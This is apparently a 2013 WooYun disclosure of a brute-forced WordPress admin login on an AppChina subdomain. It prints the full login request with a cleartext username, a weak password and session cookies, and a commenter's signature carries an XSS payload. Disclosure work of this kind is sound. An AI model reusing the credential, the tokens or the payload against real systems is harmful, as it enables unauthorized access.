当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042837

漏洞标题:应用汇某分站后台暴力破解(已进入)

相关厂商:应用汇

漏洞作者: xlz0iza1

提交时间:2013-11-14 11:52

修复时间:2013-12-29 11:53

公开时间:2013-12-29 11:53

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-14: 细节已通知厂商并且等待厂商处理中
2013-11-14: 厂商已经确认,细节仅向厂商公开
2013-11-24: 细节向核心白帽子及相关领域专家公开
2013-12-04: 细节向普通白帽子公开
2013-12-14: 细节向实习白帽子公开
2013-12-29: 细节向公众公开

简要描述:

应用汇某站暴力破解(可拿shell)

详细说明:

#1:wordpress
通过页面收集的用户信息,进行暴力破解.
http://i.appchina.com/wordpress/wp-admin/

漏洞证明:

#1:暴力破解:

POST /wordpress/wp-login.php HTTP/1.1
Host: i.appchina.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://i.appchina.com/wordpress/wp-login.php
Cookie: wordpress_test_cookie=WP+Cookie+check; pgv_pvi=6739608714; __utma=241843154.1032010893.1384226873.1384226873.1384357097.2; __utmz=241843154.1384226873.1.1.utmcsr=i.links.cn|utmccn=(referral)|utmcmd=referral|utmcct=/subdomain/; Hm_lvt_01b6de4611f54334684ef23f27e66da8=1384226874,1384357097; ref=; page=appplus.main; __utmb=241843154.2.10.1384357097; __utmc=241843154; Hm_lpvt_01b6de4611f54334684ef23f27e66da8=1384357188; AUTHENTICATION=pZRbHx5tmu95UJOubSdOXm8%2FjNMy4zjUu%2FA6JC0BRhxgxtoi4%2FGTjA%3D%3D; pgv_info=ssi=s7172679008; PLAY_ERRORS=; __utma=112688860.557649613.1384357323.1384357323.1384357323.1; __utmb=112688860.1.10.1384357323; __utmc=112688860; __utmz=112688860.1384357323.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=site%3Aappchina.com%20inurl%3Alogin; JSESSIONID=51DE7C1A6715CF1E4608172FDE94CE57; __uvt=; uvts=mOoUTNd0V4ztJkF
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
log=fengxiaoping&pwd=123qweasd&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=http%3A%2F%2Fi.appchina.com%2Fwordpress%2Fwp-admin%2F&testcookie=1


QQ图片20131114002437.jpg


#2:进入后台,可以查看、修改、删除等功能.shell也是可以的。

2013-11-14_001951.png


wordpress 拿到管理员权限所以我就无需解释啦
可以直接shell,为了不破坏贵站的数据,只截图证明漏洞,存在.

修复方案:

礼物哦,亲~

版权声明:转载请注明来源 xlz0iza1@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-11-14 12:07

厂商回复:

求QQ学习。礼物没问题。。。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-14 12:09 | xlz0iza1 ( 普通白帽子 | Rank:1027 漏洞数:207 | "><script/src=data:,alert(1)%2b")

    @应用汇 QQ331440590 学习很乐意哦.

  2. 2013-12-29 13:44 | 宾润 ( 路人 | Rank:10 漏洞数:1 | 学习,谦虚,谨慎!)

    能共享下intruder attack 工具?

  3. 2013-12-29 14:37 | 麻花藤 ( 路人 | Rank:15 漏洞数:1 | ด้้้้้็็็็็้้้้้็็็็...)

    @宾润 burp